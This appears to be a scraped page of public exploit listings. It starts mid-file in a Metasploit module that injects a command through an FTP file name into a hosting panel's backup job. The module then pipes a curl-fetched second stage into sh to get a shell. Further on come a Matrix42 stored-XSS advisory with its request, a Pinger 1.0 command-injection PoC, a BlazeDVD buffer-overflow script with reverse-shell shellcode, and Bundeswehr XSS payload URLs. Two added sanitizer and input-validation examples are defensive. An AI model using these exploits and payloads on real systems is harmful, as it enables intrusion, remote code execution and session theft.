      'Targets' => [[ 'Automatic', { }]],
      'Privileged' => true,
      'DisclosureDate' => "Mar 17 2020",
      'DefaultTarget' => 0,
      'Notes' =>
        {
          'Stability' => [ CRASH_SAFE, ],
          'Reliability' => [ FIRST_ATTEMPT_FAIL, ],
          'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES, ],
        }
    ))

    register_options(
      [
        Opt::RPORT(8083),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with']),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
      ]
    )
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login
    #
    # This is a very simple login process. Nothing important.
    # We will be using the cookie and csrf_token across the module as instance variables.
    #
    print_status('Retrieving cookie and csrf token values')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login', '/'),
    })

    unless res
      fail_with(Failure::Unreachable, 'Target is unreachable.')
    end

    unless res.code == 200
      fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 200 response code, but got #{res.code} instead.")
    end

    if res.get_cookies.empty?
      fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
    end

    @cookie = res.get_cookies
    @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''

    if @csrf_token.empty?
      fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
    end

    print_good('Cookie and CSRF token values successfully retrieved')

    print_status('Authenticating to HTTP Service with given credentials')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'login', '/'),
      'cookie' => @cookie,
      'vars_post' => {
        'token' => @csrf_token,
        'user' => username,
        'password' => password
      }
    })

    unless res
      fail_with(Failure::Unreachable, 'Target is unreachable.')
    end

    if res.body.include?('Invalid username or password.')
      fail_with(Failure::NoAccess, 'Credentials are not valid.')
    end

    if res.body.include?('Invalid or missing token')
      fail_with(Failure::UnexpectedReply, 'CSRF Token is wrong.')
    end

    if res.code == 302
      if res.get_cookies.empty?
        fail_with(Failure::UnexpectedReply, 'Server returned no HTTP cookies')
      end
      @cookie = res.get_cookies
    else
      fail_with(Failure::UnexpectedReply, "Web server error! Expected a HTTP 302 response code, but got #{res.code} instead.")
    end

  end

  def start_backup_and_trigger_payload
    #
    # Once a scheduled backup is triggered, the v-backup-user script will be executed.
    # This script will take the file name that we provided and will insert it into backup.conf
    # so that the backup process can be performed correctly.
    #
    # At this point backup.conf should contain our payload, which we can then trigger by browsing
    # to the /list/backup/ URL. Note that one can only trigger the backup (and therefore gain
    # remote code execution) if no other backup processes are currently running.
    #
    # As a result, the exploit will check to see if a backup is currently running. If one is, it will print
    # 'An existing backup is already running' to the console until the existing backup is completed, at which
    # point it will trigger its own backup to trigger the command injection using the malicious command that was
    # inserted into backup.conf

    print_status('Starting scheduled backup. Exploitation may take up to 5 minutes.')

    is_scheduled_backup_running = true

    while is_scheduled_backup_running

      # Trigger the scheduled backup process
      res = send_request_cgi({
        'method' => 'GET',
        'cookie' => @cookie,
        'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
      })

      if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
        # Due to a bug in send_request_cgi we must manually redirect ourselves!
        res = send_request_cgi({
          'method' => 'GET',
          'cookie' => @cookie,
          'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
        })
        if res && res.code == 200
          if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
            # An existing backup is taking place, so we must wait for it to finish its job!
            print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
            sleep(30)
          elsif res.body.include?('Task has been added to the queue.')
            # Backup process is being initiated
            print_good('Scheduled backup has been started ! ')
          else
            fail_with(Failure::UnexpectedReply, '/list/backup/ is reachable but replied message is unexpected.')
          end
        else
          # The web server couldn't reply to the request within the given timeout window because our payload
          # executed in the background. This means that the res object will be 'nil' due to send_request_cgi()
          # timing out, which means our payload executed!
          print_good('Payload appears to have executed in the background. Enjoy the shells <3')
          is_scheduled_backup_running = false
        end
      else
        fail_with(Failure::UnexpectedReply, '/schedule/backup/ is not reachable.')
      end
    end
  end

  def payload_implant
    #
    # Our payload will be placed as a file name on the FTP service.
    # Payload length can't be more than 255 and SPACE can't be used because of a
    # bug in the backend software.
    #
    # Due to these limitations, the payload is fetched using curl before then
    # being executed with perl. This perl script will then fetch the full
    # python payload and execute it.
    #
    final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
    p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"

    # Yet another datastore variable overriding.
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    port_restore = datastore['RPORT']
    datastore['RPORT'] = 21
    datastore['FTPUSER'] = username
    datastore['FTPPASS'] = password

    #
    # Connecting to the FTP service with the same creds as the web ui.
    # Implanting the very first stage of the payload as an empty file.
    #
    if (not connect_login)
      fail_with(Failure::NoAccess, 'Unable to authenticate to FTP service')
    end
    print_good('Successfully authenticated to the FTP service')

    res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
    if res.nil?
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
    end
    print_good('The file with the payload in the file name has been successfully uploaded.')
    disconnect

    # Revert datastore variables.
    datastore['RPORT'] = port_restore
    datastore['SSL'] = true if ssl_restore
  end

  def exploit
    start_http_server
    payload_implant
    login
    start_backup_and_trigger_payload
    stop_service
  end

  def on_request_uri(cli, request)
    print_good('First stage is executed ! Sending 2nd stage of the payload')
    second_stage = "python -c \"#{payload.encoded}\""
    send_response(cli, second_stage, {'Content-Type'=>'text/html'})
  end

  def start_http_server
    #
    # HttpClient and HttpServer use the same SSL variable :(
    # We don't need SSL for payload delivery so we
    # will disable it temporarily.
    #
    if datastore['SSL']
      ssl_restore = true
      datastore['SSL'] = false
    end
    start_service({'Uri' => {
      'Proc' => Proc.new { |cli, req|
        on_request_uri(cli, req)
      },
      'Path' => resource_uri
    }})
    print_status("Second payload download URI is #{get_uri}")
    # We need to use instance variables since get_uri keeps using
    # the SSL setting from the datastore.
    # Once the URI is retrieved, we will restore the SSL settings within the datastore.
    @second_stage_url = get_uri
    datastore['SSL'] = true if ssl_restore
  end
end

Matrix42 Workspace Management 9.1.2.2765 Cross Site Scripting


Matrix42 Workspace Management version 9.1.2.2765 suffers from a persistent cross site scripting vulnerability.


MD5 | d7622e1b5af76e87a0ba3b19190d51a8

Matrix42 Workspace Management 9.1.2.2765 – Stored Cross-Site Scripting

===============================================================================

Identifiers

-------------------------------------------------

CVE-2019-19500

CVSSv3 score

-------------------------------------------------

9.1 [AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L&version=3.1)

Vendor

-------------------------------------------------

Matrix42 ([https://www.matrix42.com](https://www.matrix42.com/))

Product

-------------------------------------------------

Matrix42 combines the disciplines of Unified Endpoint Management (UEM), Software Asset Management (SAM), Automated Endpoint Security (AES) and Service Management (ITSM). With MyWorkspace, one can use the browser to access data and applications securely regardless of the device. With MX42 Workspace Management, one actively manages devices, applications, processes, and services in a simple, secure, and compliant way. The innovative software seamlessly integrates physical, virtual, mobile and cloud-based workspaces into existing infrastructures.

Affected versions

-------------------------------------------------

- Workspace Management 9.1.2.2765 and below

Credit

-------------------------------------------------

Christian Pappas, Georg Ph E Heise (@gpheheise) / Lufthansa Industry Solutions (@LHIND_DLH)

Vulnerability summary

-------------------------------------------------

Workspace Management 9.1.2.2765 and below have a stored XSS vulnerability in the comment field for special orders. A user can use this to attack other, more privileged users, e.g. managers or admins, who view or accept the order.

Technical details

------------------------------------------------

The custom field when placing orders is vulnerable to a persistent cross site scripting (XSS) attack.

An attacker has to intercept the request made by the web application and modify it before submitting it to the server.

Proof of concept

-------------------------------------------------

The following evidence is provided to illustrate the existence and exploitation:

Modify the custom field for special orders similar to this:

"<p><strong>Kali Linux&nbsp;<img src=\"foo\" onerror=\"alert(\'Hacked by Lufthansa Industry Solutions!\')\" width=\"100\" height=\"30\"></strong></p>"},"_type"

POST /m42Services/api/WidgetDialog/UpdateData/88b223a6-0686-c617-1445-08d6df7de1cf HTTP/1.1

Host: foo.bar.de

Connection: close

Content-Length: 1629

Origin: https:/foo.bar.de

mx-application-id: MX_APPLICATION_ID

Accept-Language: de-DE

Authorization: Bearer beARerTokenHere

Content-Type: application/json;charset=UTF-8

Accept: application/json, text/plain, */*

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36

DNT: 1

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Referer: https://foo.bar.de/wm/app-SelfServicePortal/search-page/subpage

Accept-Encoding: gzip, deflate

Cookie: ASP.NET_SessionId=SESSION_ID

'{"Sys-Entity":"Ud_LHIND_Service_Form_IndividualSoftwareRequestType","ID":"REQUEST_ID","Sys-IsNew":false,"Sys-TimeStamp":"TIMESTAMP","Sys-DisplayName":"Formular individuelle Softwareanfrage","Ud_LHIND_Service_Form_IndividualSoftwareRequestClassBase":{"Sys-TimeStamp":"TIMESTAMP","ID":"fIDIDID","Software":"test","Description":"<p><strong>Kali Linux&nbsp;<img src=\"foo\" onerror=\"alert(\'Hacked by Lufthansa Industry Solutions!\')\" width=\"100\" height=\"30\"></strong></p>"},"_type":"Ud_LHIND_Service_Form_IndividualSoftwareRequestType","_id":"IDNUMMER","DisplayString":"Formular individuelle Softwareanfrage","_displayName":"Formular individuelle Softwareanfrage","_name":"Formular individuelle Softwareanfrage","IsNew":false,"SPSCommonClassBase":{"Representitives":{"AddedRelations":[],"RemovedRelations":[]},"WorkflowErrors":{"AddedRelations":[],"RemovedRelations":[]},"Tasks":{"AddedRelations":[],"RemovedRelations":[]},"RelatedBackupObject":{"AddedRelations":[],"RemovedRelations":[]},"RelatedDependentObject":{"AddedRelations":[],"RemovedRelations":[]},"ServiceBookings":{"AddedRelations":[],"RemovedRelations":[]},"Bookings":{"AddedRelations":[],"RemovedRelations":[]},"FormForShoppingCarts":{"AddedRelations":[],"RemovedRelations":[]},"Appointments":{"AddedRelations":[],"RemovedRelations":[]},"Memorandums":{"AddedRelations":[],"RemovedRelations":[]},"Service":{"AddedRelations":[],"RemovedRelations":[]},"Orders":{"AddedRelations":[],"RemovedRelations":[]},"ShoppingCarts":{"AddedRelations":[],"RemovedRelations":[]}}}'

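As an added example that is not part of the advisory or of Matrix42's code: an allowlist HTML sanitizer for a rich-text comment field, applied to the `Description` value from the request above. Storing (or rendering) the field through something like this keeps the intended formatting while dropping every event-handler attribute, script block and non-http(s) URL. The names `AllowlistSanitizer`, `sanitize`, `ALLOWED_TAGS` and `ALLOWED_ATTRS` are mine, and the allowlist itself is an assumption about which markup the field legitimately needs.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed allowlist: inline formatting plus <img> with presentation attributes only.
ALLOWED_TAGS = {"p", "strong", "em", "b", "i", "u", "br", "ul", "ol", "li", "img"}
ALLOWED_ATTRS = {"img": {"src", "alt", "width", "height"}}
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}  # their text is never user-visible prose; drop it entirely

# Constructed from the Description value in the advisory's request (JSON escaping removed).
STORED_COMMENT = (
    '<p><strong>Kali Linux&nbsp;<img src="foo" '
    'onerror="alert(\'Hacked by Lufthansa Industry Solutions!\')" '
    'width="100" height="30"></strong></p>'
)


def safe_url(value):
    """Accept relative and http(s) URLs only; rejects javascript:, data:, vbscript: ..."""
    scheme = urlsplit((value or "").strip()).scheme.lower()
    return scheme in ("", "http", "https")


class AllowlistSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; records what it dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=False)  # re-emit &nbsp; etc. verbatim
        self.out = []
        self.dropped = []     # (tag, attribute-or-None); useful for alerting on abuse
        self._skip_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._skip_depth += 1
            self.dropped.append((tag, None))
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None))
            return
        kept = []
        allowed = ALLOWED_ATTRS.get(tag, set())
        for name, value in attrs:
            # on* handlers are never allowlisted; src must pass the URL check too
            if name.startswith("on") or name not in allowed or (name == "src" and not safe_url(value)):
                self.dropped.append((tag, name))
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self._skip_depth = max(0, self._skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_entityref(self, name):
        if not self._skip_depth:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skip_depth:
            self.out.append(f"&#{name};")


def sanitize(fragment):
    """Return (clean_html, dropped) for an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    clean, dropped = sanitize(STORED_COMMENT)
    print(clean)
    print("dropped:", dropped)
```

The `dropped` list is the detection hook: a comment that loses an `onerror` attribute on the way in is worth logging with the submitting user, since a legitimate editor never produces one.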

Solution

-------------------------------------------------

Upgrade to Matrix42 Workspace Management Version 10.0

Timeline

-------------------------------------------------

Date        | Status
------------|-----------------------------
02-DEC-2019 | Reported to vendor
09-DEC-2020 | Acknowledged by vendor
31-MAR-2020 | Patch available
14-APR-2020 | Public disclosure



Pinger 1.0 Remote Code Execution


Pinger version 1.0 suffers from a remote code execution vulnerability.


MD5 | f7948410c34787bae48a24f3ba7e266e

================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Date: 2020.04.13
# Author: Milad Karimi
# Contact: miladgrayhat@gmail.com
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
# Description:
Simple, easy to use jQuery frontend to a PHP backend that pings various
devices and changes their colour from green to red depending on whether
the device is up or down.

# PoC :

http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>'>info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>'>info.php


# Vulnerable code:

<?php
if(isset($_GET['ping'])){
    // if this is ever noticeably slower, i'll pass it stuff when called
    // change the good.xml to config.xml, good is what I use at $WORK
    $xml = simplexml_load_file("config.xml");
    //$xml = simplexml_load_file("good.xml");
    if($_GET['ping'] == ""){
        $host = "127.0.0.1";
    }else{
        $host = $_GET['ping'];   // unvalidated user input
    }
    // $host is concatenated straight into a shell command line
    $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
        .' '.$host.' | grep received | awk \'{print $4}\''));
    $id = str_replace('.','_',$host);

    if(($out == "1") || ($out == "0")){
        echo json_encode(array("id"=>"h$id","res"=>"$out"));
    }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
    }
}

if(isset($_GET['socket'])){
    $xml = simplexml_load_file("config.xml");
    //$xml = simplexml_load_file("good.xml");
    if($_GET['socket'] == ""){
        $host = "127.0.0.1 80";
    }else{
        $host = str_replace(':',' ',$_GET['socket']);   // only the ':' is rewritten, nothing is validated
    }
    // same pattern: $host reaches the shell unquoted
    $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
    $id = str_replace('.','_',$host);
    $id = str_replace(' ','_',$id);
    if(preg_match("/succeeded/",$out)){
        echo json_encode(array("id"=>"h$id","res"=>"1"));
    }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
    }
}

?>
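An added example, not code from the Pinger project: the same host and socket checks, but with the user-supplied value validated first and handed to the command as its own argv element, so no shell ever parses it. The functions `validate_host`, `build_ping_argv`, `build_socket_argv` and `host_is_up` are mine; the `host:port` input form and the 1 to 60 second timeout range are assumptions.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: labels of letters, digits and hyphens, no leading hyphen,
# so a value can never be mistaken for a command-line option either.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)


def validate_host(value, default="127.0.0.1"):
    """Return a canonical IP address or a syntactically valid hostname, else raise ValueError."""
    value = (value or "").strip().strip("[]")  # tolerate [::1] style IPv6 literals
    if not value:
        return default
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"rejected host value {value!r}")


def validate_port(value):
    port = int(value)  # int() raises ValueError on anything that is not a number
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port


def validate_timeout(value):
    timeout = int(value)
    if not 1 <= timeout <= 60:  # assumed sane range for a monitoring probe
        raise ValueError(f"timeout out of range: {timeout}")
    return timeout


def build_ping_argv(host, timeout):
    """argv for the ping check; every element is a separate argument, no shell involved."""
    return ["ping", "-n", "-q", "-c", "1", "-w", str(validate_timeout(timeout)), validate_host(host)]


def build_socket_argv(socket_value, timeout):
    """argv for the TCP check; input is 'host:port' (assumed), default 127.0.0.1:80."""
    socket_value = (socket_value or "").strip() or "127.0.0.1:80"
    host, sep, port = socket_value.rpartition(":")
    if not sep:
        raise ValueError("expected host:port")
    return ["nc", "-v", "-z", "-w", str(validate_timeout(timeout)),
            validate_host(host), str(validate_port(port))]


def host_is_up(host, timeout=1):
    """Run the ping probe without a shell; True when ping exits 0."""
    argv = build_ping_argv(host, timeout)
    completed = subprocess.run(argv, capture_output=True, timeout=timeout + 2)
    return completed.returncode == 0


if __name__ == "__main__":
    print(build_ping_argv("127.0.0.1", 1))
    print(build_socket_argv("127.0.0.1:80", 1))
    try:
        build_ping_argv("127.0.0.1;id", 1)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation before argv construction is what closes the hole; passing a list to `subprocess.run` without `shell=True` is what keeps it closed even if a value slips through the regex, because the operating system receives the value as a single argument rather than a command line.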

************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************


BlazeDVD 7.0.2 Buffer Overflow


BlazeDVD version 7.0.2 SEH buffer overflow exploit.


MD5 | d83c614b5afbdff4acfcd53cdf993f6a

# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python
# Python 2 script: the str literals below are raw bytes and are written unchanged to the .plf file

file = "exploit.plf"
offset = "A" * (612 - 4)        # padding up to the SEH record
nseh = "\xeb\x1e\x90\x90"       # nSEH: short jump forward over the record
seh = "\x34\x31\x02\x64"        # SEH: address the overwritten handler is pointed at
nops = "\x90" * 24

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.121 LPORT=8888 -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"



buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()


Bundeswehr Karriere Cross Site Scripting


The Bundeswehr Karriere portal suffered from multiple cross site scripting vulnerabilities.


MD5 | de1f3d2b8b6eb34d152c970b16a0b4bf

Document Title:
===============
Bundeswehr Karriere - Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2213

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2020/04/04/bundeswehr-career-page-weak-spot-permanently-closed

Video: https://www.vulnerability-lab.com/get_content.php?id=2197


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2213


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
The Bundeswehr is the name of the armed forces of the Federal Republic
of Germany, including the Bundeswehr administration and further
organisational areas that fall within the remit of the Federal
Ministry of Defence. BWI Informationstechnik GmbH was founded in 2006
by the Bundeswehr, IBM and Siemens. Together with the companies BWI
Systeme GmbH and BWI Services GmbH, it forms the BWI service network
for implementing Herkules, the largest public-private partnership in
Europe.

(Copy of the Homepage: https://de.wikipedia.org/wiki/Bundeswehr)
(Copy of the Homepage:
https://de.wikipedia.org/wiki/BWI_Informationstechnik)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core APT Research Team has identified
several cross site scripting vulnerabilities in a
web application of the German Bundeswehr. The Bundeswehr career portal
is affected.


Affected Product(s):
====================
Vendor: Bundeswehr
Technology: Web-Server
Product: Bundeswehr Karriereportal (Web Application)
Module: Search engine - Karriere
Service provider: BWI


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Coordinated Disclosure


Technical Details & Description:
================================
Several non-persistent cross site scripting vulnerabilities have been
discovered in the official career site of the German Bundeswehr. This
vulnerability type allows attackers to manipulate client-side controlled
application calls.

The cross site scripting vulnerabilities are located in the
'termination', 'interests', 'careers' and 'search' parameters of the
'career' module in the 'search' function. The GET request is not
sanitized when it is processed with the vulnerable parameters: at no
point is the request intercepted, cleaned or filtered. As a result,
attackers can submit their own malicious input in the https request to
the official Bundeswehr career website. In the search, all parameters of
the new page are listed and thereby finally executed via the request. In
the case of a successful attack, an attacker could, for example, steal
session information such as cookies, generate phishing pages, identify
persons with external calls, integrate client-side exploits (drive-by)
or redirect to harmful web server pages. Since the web server should
recognize all external sources or integrated calls, there may be a
problem with the security of the SSL certificate via the Same Origin
Policy.

The security risk of the cross site scripting vulnerabilities in the
search function of the web application is considered medium. To exploit
the vulnerability, an attacker does not need a web application user
account, but does require light user interaction by visiting a link.
Exploitation of the vulnerability results in the theft of cookie
information, calling harmful external sources in the Bundeswehr web
context or spear phishing attacks.

Request Method(s):
[+] GET

Vulnerable Service(s):
[+] Bundeswehr Karriere (Web Application) www.bundeswehrkarriere.de

Vulnerable Module(s):
[+] Karriere Suche (ajax/filterlist/de/auswahl/33050/)

Vulnerable Parameter(s):
[+] Abschluss
[+] Interessen
[+] Laufbahnen
[+] Suche


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by attackers without a privileged
user account but with light user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability
1. Open the Bundeswehr Karriere website
Note: https://www.bundeswehrkarriere.de/karriere
2. Start an http/https protocol session tamper to intercept the request
(live)
3. Start a search and click the magnifier icon
4. While searching, the attacker inserts the payloads live into the GET
method request in the session tamper program
5. The content of the parameters is output at the bottom of the search
and executes directly
6. Successful reproduction of the vulnerability!


PoC: Payloads (Exploitation)
https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:Unteroffiziere;Suche:test

https://www.bundeswehrkarriere.de/karriere#auswahl=Militaerisch/Zivil:Militaerisch;Abschluss:Abitur;Interessen:Fuehrung;Laufbahnen:%20%3E%22%3Ciframe%20src=evil.source%20onload=alert(%22CYBERALLIANZ%22)%3E;Suche:test

